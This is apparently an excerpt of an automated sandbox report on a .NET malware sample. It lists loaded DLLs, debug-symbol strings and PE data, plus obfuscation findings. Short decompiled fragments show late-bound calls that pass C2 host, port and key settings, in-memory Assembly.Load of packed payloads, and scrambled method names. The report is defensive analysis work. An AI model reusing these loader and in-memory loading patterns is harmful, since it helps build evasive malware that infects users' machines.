                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbs source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: fSgG.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: Binary string: Accessibility.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: n.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdb$ source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Configuration.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Configuration.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Xml.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Core.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: \??\C:\Windows\symbols\exe\fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: %%.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.0000000006797000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp, WER7A57.tmp.dmp.13.dr
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb] source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Desktop\fSgG.pdbe source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Windows.Forms.pdb|c source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.PDB source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdbSK source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Drawing.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: mscorlib.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Management.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: Binary string: symbols\dll\mscorlib.pdbLb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, Form1.cs.Net Code: InitializeComponent
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs.Net Code: Memory
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Messages.cs.Net Code: Memory
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: 0xBE7B7599 [Wed Apr 8 23:41:13 2071 UTC]
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 0_2_009DEE10 pushfd ; iretd 0_2_009DEE11
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_05458160 push esp; iretd 5_2_05458161
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: section name: .text entropy: 7.7368081138603095
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.csHigh entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, YqOlYl2eFwtfPkt21E.csHigh entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, MhaIhDzaPUNsFfpULt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, RqmCPZsVMMv5nbrMN6.csHigh entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, iNFWmT65K4oBOHdv97.csHigh entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, mdHoHt9MfgQhGOrMY7.csHigh entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, gkMdOYbUoH9rcjFeuZ.csHigh entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, PonY1JM82D8ygbKCcG.csHigh entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, OOJ1Sjc3ammghXBN9E.csHigh entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, ChekuZ3HCIwSmN8ZNP.csHigh entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, LDBvEBvJJ3O33kFquaV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, ySkLlbvukfHRnCTtESI.csHigh entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, aIGDt4fqLpMXZpZXEp.csHigh entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, vVt6wEQ8mT4XM4diZg.csHigh entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, amwXR0CPXsVauy8NYU.csHigh entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, oU7Yibkb84IpiWUtkd.csHigh entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, iGrKvbOUPHtmRDgSTJ.csHigh entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, BXplLTWfheod5WBiyg.csHigh entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, Nffji0ITJKe56hgjhg.csHigh entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, VTGJwXxvM7Ziv4PKG3.csHigh entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2645004.3.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.2638bc0.2.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.csHigh entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, YqOlYl2eFwtfPkt21E.csHigh entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, MhaIhDzaPUNsFfpULt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, RqmCPZsVMMv5nbrMN6.csHigh entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, iNFWmT65K4oBOHdv97.csHigh entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, mdHoHt9MfgQhGOrMY7.csHigh entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, gkMdOYbUoH9rcjFeuZ.csHigh entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, PonY1JM82D8ygbKCcG.csHigh entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, OOJ1Sjc3ammghXBN9E.csHigh entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
